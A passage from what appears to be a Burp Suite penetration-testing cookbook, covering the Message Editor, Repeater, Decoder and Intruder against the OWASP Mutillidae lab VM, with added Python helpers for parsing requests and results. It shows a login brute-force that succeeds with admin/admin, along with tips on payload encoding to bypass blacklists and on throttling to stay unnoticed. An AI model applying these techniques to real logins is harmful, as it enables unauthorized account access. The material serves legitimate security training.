and columns can be added, removed, or modified in the table within tools such 
as Proxy and Repeater. 


For requests containing parameters or cookies, the Params tab is present. 
Parameters are editable, and columns can be added, removed, or modified in the 
table within tools such as Proxy and Repeater. 


Finally, there's the Hex tab, which presents the message in hexadecimal format; 
it is, in essence, a hex editor. You are permitted to edit individual bytes within 
tools such as Proxy and Repeater, but those values must be given in two-digit 
hexadecimal form, from 00 through FF. 
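To make the Raw, Headers, Params, and Hex views concrete, here is an added 
Python example (it is not code from the book or from Burp) that parses a 
constructed copy of the Mutillidae login request into the same three views. 
The sample request, the helper names, and the hex layout are assumptions for 
illustration; it also compares the Content-Length header with the actual body 
length, the mismatch that Intruder's default Update Content-Length header 
option exists to correct. 

```python
from urllib.parse import parse_qsl

# Constructed sample, modelled on the Mutillidae login request shown in this
# chapter; it was not captured from a live session.
SAMPLE_REQUEST = (
    "POST /mutillidae/index.php?page=login.php HTTP/1.1\r\n"
    "Host: 192.168.56.101\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 63\r\n"
    "Cookie: showhints=1; PHPSESSID=juttplah3jsrpg6h03di4go4d2; "
    "acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada\r\n"
    "Connection: close\r\n"
    "\r\n"
    "username=admin&password=adminpass&login-php-submit-button=Login"
)


def parse_request(raw):
    """Split a raw HTTP/1.1 request into the views the Message Editor offers.

    'headers' is an ordered list of (name, value) pairs like the Headers tab;
    'params' is a list of (type, name, value) like the Params tab, where type
    is URL, Cookie or Body.
    """
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    request_line = lines[0]
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip(), value.strip()))
    lowered = {n.lower(): v for n, v in headers}

    params = []
    # URL params: the query string of the request target.
    target = request_line.split(" ")[1]
    if "?" in target:
        query = target.split("?", 1)[1]
        params += [("URL", n, v) for n, v in parse_qsl(query, keep_blank_values=True)]
    # Cookie params: "name=value" pairs separated by ";" in the Cookie header.
    for part in lowered.get("cookie", "").split(";"):
        part = part.strip()
        if part:
            n, _, v = part.partition("=")
            params.append(("Cookie", n, v))
    # Body params: only present for URL-encoded form bodies.
    if body and lowered.get("content-type", "").startswith("application/x-www-form-urlencoded"):
        params += [("Body", n, v) for n, v in parse_qsl(body, keep_blank_values=True)]

    return {"request_line": request_line, "headers": headers,
            "params": params, "body": body}


def check_content_length(parsed):
    """Return (declared, actual) body length. Editing the body in the Raw tab
    without updating this header yields a request the server truncates or
    rejects, which is why Intruder updates Content-Length by default."""
    lowered = {n.lower(): v for n, v in parsed["headers"]}
    declared = lowered.get("content-length")
    actual = len(parsed["body"].encode("latin-1"))
    return (int(declared) if declared is not None else None, actual)


def hex_view(raw, width=16):
    """Render the message like the Hex tab: offset, one two-digit hex value
    (00..FF) per byte, and an ASCII column with non-printables as '.'."""
    data = raw.encode("latin-1")
    rows = []
    for offset in range(0, len(data), width):
        chunk = data[offset:offset + width]
        hex_part = " ".join("%02X" % b for b in chunk)
        ascii_part = "".join(chr(b) if 32 <= b < 127 else "." for b in chunk)
        rows.append("%08X  %-*s  %s" % (offset, width * 3 - 1, hex_part, ascii_part))
    return rows


if __name__ == "__main__":
    parsed = parse_request(SAMPLE_REQUEST)
    for kind, name, value in parsed["params"]:
        print("%-6s %-24s %s" % (kind, name, value))
    print("Content-Length declared/actual:", check_content_length(parsed))
    print("\n".join(hex_view(SAMPLE_REQUEST)[:3]))
```

Running the script prints the eight parameters Burp's Params tab shows for 
this request (one URL, four Cookie, three Body), confirms the declared 
Content-Length of 63 matches the body, and prints the first three rows of the 
hex dump. 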


Getting ready 


Let's explore the multiple tabs available in the Message Editor for each request 
and response captured in Burp. 


How to do it... 


Ensure you have traffic flowing between your browser, Burp, and the OWASP 
BWA virtual machine. 


1. Looking at the Target | Site map tab, notice the Message Editor section: 


[Screenshot: Message Editor with Request | Response tabs and Raw | Headers | 
Hex subtabs] 

GET /mutillidae/ HTTP/1.1 
Host: 192.168.56.101 
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 
Accept-Language: en-US,en;q=0.5 
Accept-Encoding: gzip, deflate 
Referer: http://192.168.56.101/ 
Connection: close 
Upgrade-Insecure-Requests: 1 


2. When viewing a request, note that the subtabs available include Raw, 
Headers, and Hex, at a minimum. However, in the case of a request 
containing parameters or cookies, the Params subtab is also available: 


[Screenshot: Params subtab for the login.php request] 

Type    Name                      Value 
Cookie  showhints                 1 
Cookie  PHPSESSID                 juttplah3jsrpg6h03di4go4d2 
Cookie  acopendivids              swingset,jotto,phpbb2,redmine 
Cookie  acgroupswithpersist       nada 
Body    username                  admin 
Body    password                  adminpass 
Body    login-php-submit-button   Login 

Body encoding: application/x-www-form-urlencoded 


3. The other side of the message is the Response tab, containing the Raw, 
Headers, and Hex subtabs, and sometimes HTML and Render. These are the 
various formats provided for the HTTP response to the request. If the 
content is HTML, then the HTML tab will appear. Likewise, the Render tab 
displays the HTML as it would be presented in a browser, but without 
any JavaScript executed: 


HTTP/1.1 200 OK 
Date: Mon, 27 Aug 2018 11:07:03 GMT 
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1 
X-Powered-By: PHP/5.3.2-1ubuntu4.30 
Logged-In-User: 
Vary: Accept-Encoding 
Content-Length: 50373 
Connection: close 
Content-Type: text/html 


Repeating with Repeater 


Repeater allows for slight changes or tweaks to the request, and it is displayed in 
the left-hand window. A Go button allows the request to be reissued, and the 
response is displayed in the right-hand window. 


Details related to your HTTP request include standard Message Editor details 
such as Raw, Params (for requests with parameters or cookies), Headers, and 
Hex. 


Details related to the HTTP Response include standard Message Editor details 
including Raw, Headers, Hex, and, sometimes, HTML and Render. 


At the bottom of each panel is a search-text box, allowing the tester to quickly 
find a value present in a message. 


Getting ready 


Repeater allows you to manually modify and then re-issue an individual HTTP 
request, analyzing the response that you receive. 


How to do it... 


1. From the Target | Site map or from Proxy | HTTP history tabs (shown in 
the following screenshot), right-click a message and select Send to 
Repeater: 


[Screenshot: Proxy | HTTP history tab. Logging of out-of-scope Proxy traffic 
is disabled. Filter: Hiding CSS, image and general binary content.] 

#   Host                    Method  URL                    Status 
1   http://192.168.56.101   GET                            200 
3   http://192.168.56.101   GET     /animatedcollapse.js   200 
4   http://192.168.56.101   GET     /jquery.min.js         200 
10  http://192.168.56.101   GET     /mutillidae            301 

GET /mutillidae/ HTTP/1.1 
Host: 192.168.56.101 
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 
Accept-Language: en-US,en;q=0.5 
Accept-Encoding: gzip, deflate 
Referer: http://192.168.56.101/ 
Connection: close 
Upgrade-Insecure-Requests: 1 

[Right-click context menu on the selected request: Send to Spider, Do an 
active scan, Do a passive scan, Send to Intruder, Send to Repeater, Send to 
Sequencer, Send to Comparer] 


2. Switch over to the Repeater tab. Note the HTTP Request is ready for the 
tester to tweak parameters, and then send the request to the application via 
the Go button. 


Note the search boxes at the bottom of each panel: 


GET /mutillidae/ HTTP/1.1 
Host: 192.168.56.101 
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 
Accept-Language: en-US,en;q=0.5 
Accept-Encoding: gzip, deflate 
Referer: http://192.168.56.101/ 
Connection: close 
Upgrade-Insecure-Requests: 1 


We will use Repeater quite a bit throughout this book. This chapter is just 
an introduction to Repeater and its purpose. 


Decoding with Decoder 


Burp Decoder is a tool that allows the tester to convert raw data into encoded 
data or to take encoded data and convert it back to plain text. Decoder supports 
several formats including URL encoding, HTML encoding, Base64 encoding, 
binary code, hashed data, and others. Decoder also includes a built-in hex editor. 


Getting ready 


As a web penetration test progresses, a tester might happen upon an encoded 
value. Burp eases the decoding process by allowing the tester to send the 
encoded value to Decoder and try the various decoding functions available. 


How to do it... 


Let's try to decode the value of the session token PHPSESSID found in the 
OWASP Mutillidae II application. When a user initially browses to the URL 
(http://<Your_VM_Assigned_IP_Address>/mutillidae/), that user will be 
assigned a PHPSESSID cookie. The PHPSESSID value appears to be encrypted 
and then wrapped in Base64 encoding. Using Decoder, we can unwrap the value. 


1. Browse to the http://<Your_VM_Assigned_IP_Address>/mutillidae/ 
application. 

2. Find the HTTP request you just generated from your browsing within the 
Proxy | HTTP history tab (shown in the next screenshot). Highlight the 
PHPSESSID value, not the parameter name, right-click, and select Send to 
Decoder: 


[Screenshot: Proxy | HTTP history tab. Logging of out-of-scope Proxy traffic 
is disabled. The selected row is the GET request for 
/mutillidae/index.php?page=login.php; the PHPSESSID cookie value is 
highlighted and the right-click menu is open: Send to Spider, Do an active 
scan, Do a passive scan, Send to Intruder, Send to Repeater, Send to 
Sequencer, Send to Comparer.] 

GET /mutillidae/index.php?page=login.php HTTP/1.1 
Host: 192.168.56.101 
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 
Accept-Language: en-US,en;q=0.5 
Accept-Encoding: gzip, deflate 
Referer: http://192.168.56.101/mutillidae/ 
Cookie: showhints=1; PHPSESSID=[highlighted value]; acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada 
Connection: close 
Upgrade-Insecure-Requests: 1 


3. In the Decoder tab, in the Decode as... drop-down as follows, select Base 
64. Note the results are viewed in the Hex editor and are encrypted: 


[Screenshot: Decoder tab with Decode as... set to Base 64; the decoded result 
is shown in the Hex editor] 


In this example, we cannot proceed any further. We can confirm the 
value was, indeed, wrapped in Base 64. However, the value that is 
unwrapped is encrypted. The purpose of this recipe is to show you how 
you can use Decoder to manipulate encoded values. 
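The judgement made at the end of this recipe, that the unwrapped value is 
encrypted rather than something Decoder can take further, can be made 
systematically. The following is an added Python example, not code from the 
book or from Burp, that decodes a value as Base64 the way Decoder does 
(tolerating missing padding and the URL-safe alphabet), shows the result as 
hex, and uses printable-character ratio and Shannon entropy to decide whether 
the bytes are readable text or opaque data. The two sample tokens are 
constructed for the example; they are not Mutillidae session IDs. 

```python
import base64
import binascii
import math
import string

# Bytes that Decoder's text view would show as readable characters.
PRINTABLE = set(string.printable.encode("ascii")) - set(b"\x0b\x0c")

# Constructed sample tokens (not captured from Mutillidae): one wraps a
# readable string, the other wraps bytes chosen to look like ciphertext.
TEXT_TOKEN = base64.b64encode(b"user=admin;role=1").decode("ascii")
OPAQUE_TOKEN = base64.b64encode(
    bytes([0x8F, 0x13, 0xE2, 0x00, 0xA7, 0x5C, 0xD9, 0x41,
           0x02, 0xFE, 0x7B, 0x90, 0xC3, 0x18, 0x6D, 0xAA])).decode("ascii")


def decode_base64(value):
    """Decode as Base64 the way Decoder does: accept the URL-safe alphabet
    and missing '=' padding. Returns None when the value is not Base64."""
    s = value.strip().replace("-", "+").replace("_", "/")
    s += "=" * (-len(s) % 4)
    try:
        return base64.b64decode(s, validate=True)
    except (binascii.Error, ValueError):
        return None


def shannon_entropy(data):
    """Bits of entropy per byte; 8.0 is the maximum for uniformly random data."""
    if not data:
        return 0.0
    n = len(data)
    counts = {}
    for b in data:
        counts[b] = counts.get(b, 0) + 1
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def classify(data):
    """Verdict on decoded bytes: 'text' if nearly all printable, 'opaque'
    (compressed, encrypted or random, so no further Decoder transform will
    make it readable) if mostly non-printable, otherwise 'mixed'."""
    if not data:
        return "empty"
    printable = sum(1 for b in data if b in PRINTABLE) / len(data)
    if printable >= 0.95:
        return "text"
    if printable < 0.7:
        return "opaque"
    return "mixed"


def unwrap(value):
    """Replicate the recipe: decode the token as Base64, view the result as
    hex (like Decoder's hex editor) and judge whether it is worth decoding
    any further."""
    data = decode_base64(value)
    if data is None:
        return {"base64": False, "verdict": "not Base64", "hex": "", "entropy": 0.0}
    return {"base64": True, "verdict": classify(data), "hex": data.hex(),
            "entropy": round(shannon_entropy(data), 2)}


if __name__ == "__main__":
    for token in (TEXT_TOKEN, OPAQUE_TOKEN, "PHPSESSID=abc"):
        print(token, "->", unwrap(token))
```

The first token decodes to readable text and would be worth inspecting 
further; the second decodes cleanly but to bytes with no readable structure, 
which is the situation this recipe ends in; the third is rejected outright 
because it is not valid Base64 at all. 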


Intruding with Intruder 


The Burp Intruder allows a tester to brute-force or fuzz specific portions of an 
HTTP message, using customized payloads. 


To properly set up customized attacks in Intruder, a tester will need to use the 
settings available in the four subtabs of Intruder: 


[Screenshot: Intruder subtabs Target, Positions, Payloads, and Options. 
Attack Target: Configure the details of the target for the attack. 
Host: 127.0.0.1, Port: 80, [ ] Use HTTPS] 


Getting ready 


A tester may wish to fuzz or brute-force parameter values within a message. 
Burp Intruder eases this process by providing various intruder attack styles, 
payloads, and options. 


How to do it... 


1. Browse to the login screen of Mutillidae and attempt to log into the 
application. For example, type a username of admin and a password of 
adminpass. 

2. Find the login attempt in the Proxy | HTTP history tab. Your request 
number (that is, the # sign on the left-hand side) will be different from the 
one shown next. Select the message that captured your attempt to log in. 


3. As the login attempt message is highlighted in the HTTP history table, 
right-click the Request tab, and select Send to Intruder: 
[Screenshot: Proxy | HTTP history tab. Logging of out-of-scope Proxy traffic 
is disabled. Filter: Hiding CSS, image and general binary content.] 

#   Host                    Method  URL                                           Status  Length  MIME type  Extension 
4   http://192.168.56.101   GET     /jquery.min.js                                200     57733   script     js 
10  http://192.168.56.101   GET     /mutillidae                                   301     683     HTML 
11  http://192.168.56.101   GET     /mutillidae/                                  200     46164   HTML 
14  http://192.168.56.101   GET     /mutillidae/javascript/bookmark-site.js       200     1541    script     js 
15  http://192.168.56.101   GET     /mutillidae/javascript/ddsmoothmenu/jqu...    200     57733   script     js 
16  http://192.168.56.101   GET     /mutillidae/javascript/ddsmoothmenu/dd...     200     9116    script     js 
18  http://192.168.56.101   GET     /mutillidae/javascript/jQuery/jquery.js       200     268220  script     js 
19  http://192.168.56.101   GET     /mutillidae/javascript/jQuery/jquery.ballo... 200     11816   script     js 
20  http://192.168.56.101   GET     /mutillidae/javascript/jQuery/colorbox/j...   200     10323   script     js 
41  http://192.168.56.101   GET     /mutillidae/index.php?page=login.php          200     50769   HTML       php 

[Right-click context menu on the selected login request: Send to Spider, Do an 
active scan, Do a passive scan, Send to Intruder, Send to Repeater, Send to 
Sequencer, Send to Comparer, Send to Decoder, Show response in browser, 
Request in browser, Engagement tools] 

POST /mutillidae/index.php?page=login.php HTTP/1.1 
Host: 192.168.56.101 
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 
Accept-Language: en-US,en;q=0.5 
Accept-Encoding: gzip, deflate 
Referer: http://192.168.56.101/mutillidae/index.php?page=login.php 
Content-Type: application/x-www-form-urlencoded 
Content-Length: 63 
Cookie: showhints=1; PHPSESSID=juttplah3jsrpg6h03di4go4d2; acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada 
Connection: close 
Upgrade-Insecure-Requests: 1 

username=admin&password=adminpass&login-php-submit-button=Login 


Target 


The Intruder Target tab defines your targeted web application. These settings are 
pre-populated for you by Burp: 


[Screenshot: Intruder | Target tab. Attack Target: Configure the details of 
the target for the attack. Host: 192.168.56.101, Port: 80, [ ] Use HTTPS] 


Positions 


The Positions tab identifies where the payload markers are to be defined within 
the Payload | Positions section. For our purposes, click the Clear § (that is, 
payload markers) from the right-hand side menu. Manually select the password 
field by highlighting it with your cursor. Now click the Add § button on the 
right-hand side menu. You should have the payload markers wrapping around 
the password field as follows: 


[Screenshot: Intruder | Positions tab. Configure the positions where payloads 
will be inserted into the base request. The attack type determines the way in 
which payloads are assigned to payload positions.] 

POST /mutillidae/index.php?page=login.php HTTP/1.1 
Host: 192.168.56.101 
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 
Accept-Language: en-US,en;q=0.5 
Accept-Encoding: gzip, deflate 
Referer: http://192.168.56.101/mutillidae/index.php?page=login.php 
Content-Type: application/x-www-form-urlencoded 
Content-Length: 63 
Cookie: showhints=1; PHPSESSID=juttplah3jsrpg6h03di4go4d2; acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada 
Connection: close 
Upgrade-Insecure-Requests: 1 

username=admin&password=§adminpass§&login-php-submit-button=Login 
Payloads 


After the Positions tab is the Payloads tab. The Payloads tab identifies wordlist 
values or numbers you wish to be inserted into the positions you identified on 
the previous tab. There are several sections within the Payloads tab, including 
Payload Sets, Payload Options, Payload Processing, and Payload Encoding. 


Payload Sets 


Payload Sets allows for the setting of the number of payloads as well as the 
type. For our purposes, we will use the default settings for Sniper, allowing us to 
use one payload with a Payload type of Simple list: 


[Screenshot: Payload Sets section. You can define one or more payload sets, 
and each payload type can be customized in different ways. 
Payload set: 1    Payload count: 0 
Payload type: Simple list    Request count: 0] 


Payload Options 


In the Payload Options section, a tester can configure a custom payload or load 
a preconfigured one from a file. 


For our purposes, we will add one value to our payload. In the text box, type 
admin, and then click the Add button to create our custom payload: 


[Screenshot: Payload Options [Simple list]. This payload type lets you 
configure a simple list of strings that are used as payloads. Buttons: Paste, 
Load ..., Remove, Clear, Add, Add from list ...] 


Payload Processing 


Payload Processing is useful when configuring special rules to be used while 
Intruder substitutes payloads into payload marker positions. For this recipe, we 
do not need any special payload-processing rules: 


[Screenshot: Payload Processing. You can define rules to perform various 
processing tasks on each payload before it is used. The rule table, with 
columns Enabled and Rule, is empty; buttons include Edit, Up, and Down.] 


Payload Encoding 


Payload Encoding is applied to the payload value prior to sending the request to 
the web server. Many web servers may block offensive payloads (for example, 
<script> tags), so the encoding feature is a means to circumvent any blacklist 
blocking. 


For the purpose of this recipe, leave the default box checked: 


[Screenshot: Payload Encoding. This setting can be used to URL-encode 
selected characters within the final payload, for safe transmission within 
HTTP requests. [x] URL-encode these characters] 


Options 


Finally, the Intruder | Options tab provides attack table customizations, 
particularly related to responses captured such as specific error messages. There 
are several sections within the Intruder | Options tab, including Request 
Headers, Request Engine, Attack Results, Grep-Match, Grep-Extract, Grep 
- Payloads, and Redirections: 




Request Headers 


Request Headers offers configurations specific to header parameters while 
Intruder is running attacks. For the purpose of this recipe, leave the default boxes 
checked: 


[Screenshot: Request Headers. These settings control whether Intruder updates 
the configured request headers during attacks. 
[x] Update Content-Length header 
[x] Set Connection: close] 


Request Engine 


Request Engine should be modified if a tester wishes to create less noise on the 
network while running Intruder. For example, a tester can throttle attack requests 
using variable timings so they seem more random to network devices. This is 
also the location for lowering the number of threads Intruder will run against the 
target application. 


For the purpose of this recipe, leave the default settings as-is: 


[Screenshot: Request Engine. These settings control the engine used for 
making HTTP requests when performing attacks. 
Number of threads: 5 
Number of retries on network failure: 3 
Pause before retry (milliseconds): 2000 
Throttle (milliseconds): (•) Fixed 0    ( ) Variable: start ..., step 30000 
Start time: (•) Immediately    ( ) In 10 minutes    ( ) Paused] 


Attack Results 


After starting the attack, Intruder creates an attack table. The Attack Results 
section offers some settings around what is captured within that table. 


For the purpose of this recipe, leave the default settings as-is: 


[Screenshot: Attack Results. These settings control what information is 
captured in attack results. 
[x] Store requests 
[x] Store responses 
[x] Make unmodified baseline request 
[ ] Use denial-of-service mode (no results) 
[ ] Store full payloads] 


Grep - Match 


Grep - Match is a highly useful feature that, when enabled, creates additional 
columns in the attack table results to quickly identify errors, exceptions, or even 
a custom string within the response. 


For the purpose of this recipe, leave the default settings as-is: 


[Screenshot: Grep - Match. These settings can be used to flag result items 
containing specified expressions. 
[x] Flag result items with responses matching these expressions: 
error, exception, illegal, invalid, fail, stack, access, directory, file, ... 
(buttons: Paste, Load..., Remove, Clear, Add) 
Match type: (•) Simple string    ( ) Regex 
[ ] Case sensitive match 
[x] Exclude HTTP headers] 


Grep - Extract 


Grep - Extract, when enabled, is another option for adding a column in the 
attack table whose label is specific to a string found in the response. This option 
differs from Grep - Match, since Grep - Extract values are taken from an actual 
HTTP response, as opposed to an arbitrary string. 


For the purpose of this recipe, leave the default settings as-is: 


[Screenshot: Grep - Extract. These settings can be used to extract useful 
information from responses into the attack results table. 
[ ] Extract the following items from responses: (empty list; buttons Remove, 
Duplicate, Up, Down, Clear) 
Maximum capture length: 100] 


Grep - Payloads 


Grep - Payloads provides a tester the ability to add columns in the attack table 
in which responses contain reflections of payloads. 


For the purpose of this recipe, leave the default settings as-is: 


[Screenshot: Grep - Payloads. These settings can be used to flag result items 
containing reflections of the submitted payload. 
[ ] Search responses for payload strings 
[ ] Case sensitive match 
[ ] Exclude HTTP headers 
[x] Match against pre-URL-encoded payloads] 


Redirections 


Redirections instructs Intruder to never, conditionally, or always follow 
redirections. This feature is very useful, particularly when brute-forcing logins, 
since a 302 redirect is generally an indication of entry. 


For the purpose of this recipe, leave the default settings as-is: 


[Screenshot: Redirections. These settings control how Burp handles 
redirections when performing attacks. 
Follow redirections: (•) Never    ( ) On-site only    ( ) In-scope only    ( ) Always 
[ ] Process cookies in redirections] 


Start attack button 


Finally, we are ready to start Intruder. On either the Payloads or the Options 
tabs, click the Start attack button to begin: 


[Screenshot: Intruder tabs Target | Positions | Payloads | Options, with the 
Start attack button beside the Payload Sets section] 


When the attack has started, an attack results table will appear. This allows the 
tester to review all requests using the payloads within the payload marker 
positions. It also allows us to review all responses, with columns showing 
Status, Error, Timeout, Length, and Comment. 


For the purpose of this recipe, we note that the payload of admin in the password 
parameter produced a status code of 302, which is a redirect. This means we 
logged into the Mutillidae application successfully: 


POST /mutillidae/index.php?page=login.php HTTP/1.1 
Host: 192.168.56.101 
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 
Accept-Language: en-US,en;q=0.5 
Accept-Encoding: gzip, deflate 
Referer: http://192.168.56.101/mutillidae/index.php?page=login.php 
Content-Type: application/x-www-form-urlencoded 
Content-Length: 59 
Cookie: showhints=1; PHPSESSID=juttplah3jsrpg6h03di4go4d2; acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada 
Connection: close 
Upgrade-Insecure-Requests: 1 

username=admin&password=admin&login-php-submit-button=Login 


Looking at Response | Render within the attack table allows us to see how the 
web application responded to our payload. As you can see, we are successfully 
logged in as an admin: 


[Screenshot: Intruder attack window with Attack, Save, and Columns menus and 
Results | Target | Positions | Payloads | Options tabs. Filter: Showing all 
items. Results table columns: Request, Payload, Status, Error, Timeout, 
Length, Comment; request 0 (the unmodified baseline) returned status 200 with 
length 50838. The Response | Render view shows the OWASP Mutillidae II: Web 
Pwn in Mass Production page with Hints: Enabled (1 - Script Kiddie) and 
Security Level: 0 (Hosed). Status bar: Finished] 
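The Grep - Match, Grep - Payloads, and Redirections options described above, 
and the attack results table that this recipe ends with, all amount to 
classifying each response by a few simple tests. The following added Python 
example, which is not code from the book or from Burp, applies those tests to 
three constructed responses: a baseline, a redirect such as the one this 
recipe treats as a successful login, and a response that reflects its 
payload. The response texts, payload list, and function names are 
assumptions made for the example; the grep expressions are the Intruder 
defaults listed earlier. 

```python
import re

# Default Grep - Match expressions from the Intruder | Options tab.
DEFAULT_GREP = ["error", "exception", "illegal", "invalid", "fail",
                "stack", "access", "directory", "file"]

# Constructed responses (not captured from Mutillidae): request 0 is the
# unmodified baseline, requests 1 and 2 carry the payloads below.
PAYLOADS = ["", "admin", "guest"]
RESPONSES = [
    "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n"
    "<p class=\"error\">Password incorrect</p>",
    "HTTP/1.1 302 Found\r\nLocation: index.php?page=home.php\r\n"
    "Content-Length: 0\r\n\r\n",
    "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n"
    "<p>Account guest not found</p>",
]


def split_response(raw):
    """Return (status code, lower-cased header dict, body) for a raw response."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    status = int(lines[0].split(" ")[1])
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers, body


def grep_match(text, expressions, case_sensitive=False, regex=False):
    """Grep - Match: one flag per expression, as a simple string or a regex."""
    flags = []
    for expr in expressions:
        if regex:
            found = re.search(expr, text, 0 if case_sensitive else re.IGNORECASE) is not None
        elif case_sensitive:
            found = expr in text
        else:
            found = expr.lower() in text.lower()
        flags.append(found)
    return flags


def build_results(payloads, responses, expressions=DEFAULT_GREP, exclude_headers=True):
    """One row per request, with the columns the attack table shows: Request,
    Payload, Status, Length, the Grep - Match flags, the Grep - Payloads
    reflection flag, and the redirect target that Redirections would follow."""
    rows = []
    for number, (payload, raw) in enumerate(zip(payloads, responses)):
        status, headers, body = split_response(raw)
        haystack = body if exclude_headers else raw
        rows.append({
            "request": number,
            "payload": payload,
            "status": status,
            "length": len(raw.encode("latin-1")),
            "grep": dict(zip(expressions, grep_match(haystack, expressions))),
            "reflected": bool(payload) and payload in body,
            "redirect": headers.get("location") if 300 <= status < 400 else None,
        })
    return rows


def differs_from_baseline(rows):
    """Request numbers whose status or length differs from request 0, which
    is the first thing a tester sorts the attack table by."""
    base = rows[0]
    return [r["request"] for r in rows[1:]
            if r["status"] != base["status"] or r["length"] != base["length"]]


if __name__ == "__main__":
    for row in build_results(PAYLOADS, RESPONSES):
        hits = [k for k, v in row["grep"].items() if v]
        print(row["request"], repr(row["payload"]), row["status"], row["length"],
              "grep:", hits, "reflected:", row["reflected"], "redirect:", row["redirect"])
```

With Exclude HTTP headers on, only the body is searched, so a Location header 
or a Server banner containing "file" never trips a grep flag; the baseline 
row is flagged on "error", the 302 row carries its redirect target, and the 
third row shows the payload reflected back, which is the column Grep - 
Payloads adds. 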


Configuring, Spidering, Scanning, and Reporting with Burp 


In this chapter, we will cover the following recipes: 


• Establishing trust over HTTPS 
• Setting project options 
• Setting user options 
• Spidering with Spider 
• Scanning with Scanner 
• Reporting issues 


Introduction 


This chapter helps testers to calibrate Burp settings so they're less abusive 
toward the target application. Tweaks within Spider and Scanner options can 
assist with this issue. Likewise, penetration testers can find themselves in 
interesting network situations when trying to reach a target. Thus, several tips 
are included for testing sites running over HTTPS, or sites only accessible 
through a SOCKS Proxy or a port forward. Such settings are available within 
project and user options. Finally, Burp provides the functionality to generate 
reports for issues. 


Software tool requirements 


In order to complete the recipes in this chapter, you will need the following: 


• OWASP Broken Web Applications (VM) 
• OWASP Mutillidae link 
• Burp Proxy Community or Professional (https://portswigger.net/burp/) 
• Firefox browser configured to allow Burp to proxy traffic 
  (https://www.mozilla.org/en-US/firefox/new/) 
• The proxy configuration steps are covered in chapter 


Establishing trust over HTTPS 


Since most websites implement Hypertext Transfer Protocol Secure 
(HTTPS), it is beneficial to know how to enable Burp to communicate with such 
sites. HTTPS is Hypertext Transfer Protocol (HTTP) carried inside an 
encrypted tunnel. 


The purpose of HTTPS is to encrypt traffic between the client browser and the 
web application to prevent eavesdropping. However, as testers, we wish to allow 
Burp to eavesdrop, since that is the point of using an intercepting proxy. Burp 
provides a root Certificate Authority (CA) certificate. This certificate 
can be used to establish trust between Burp and the target web application. 


By default, Burp's Proxy generates a per-target certificate, signed by its own 
CA, when establishing an encrypted handshake with a target running over HTTPS. 
That takes care of the Burp-to-web-application portion of the tunnel. We also 
need to address the browser-to-Burp portion. 


In order to create a complete HTTPS tunnel connection between the client 
browser, Burp, and the target application, the client will need to trust the 
PortSwigger certificate as a trusted authority within the browser. 


Getting ready 


In situations requiring penetration testing with a website running over HTTPS, a 
tester must import the PortSwigger CA certificate as a trusted authority within 
their browser. 


How to do it... 


Ensure Burp is started and running and then execute the following steps: 


1. Open the Firefox browser to the http://burp URL. You must type the URL 
exactly as shown to reach this page. You should see the following screen in 
your browser. Note the link on the right-hand side labeled CA Certificate. 
Click the link to download the PortSwigger CA certificate: 


[Screenshot: Firefox at http://burp showing the Burp Suite Professional 
welcome page ("Welcome to Burp Suite Professional.") with the CA Certificate 
link in the upper right] 


2. You will be presented with a dialog box prompting you to download the 
PortSwigger CA certificate. The file is labeled cacert.der. Download the 
file to a location on your hard drive. 

3. In Firefox, open the Firefox menu. Click on Options. 


4. Click Privacy & Security on the left-hand side and scroll down to the 
Certificates section. Click the View Certificates... button: 


[Screenshot: Firefox about:preferences#privacy, Privacy & Security pane, 
scrolled to the Certificates section. When a server requests your personal 
certificate: ( ) Select one automatically  (•) Ask you every time. 
[x] Query OCSP responder servers to confirm the current validity of 
certificates. Buttons: View Certificates..., Security Devices...] 


5. Select the Authorities tab. Click Import, select the Burp CA certificate file 
that you previously saved, and click Open: 


[Screenshot: Certificate Manager dialog, Authorities tab. You have 
certificates on file that identify these certificate authorities, listed by 
Certificate Name and Security Device (for example, AC Camerfirma S.A. and ACCV 
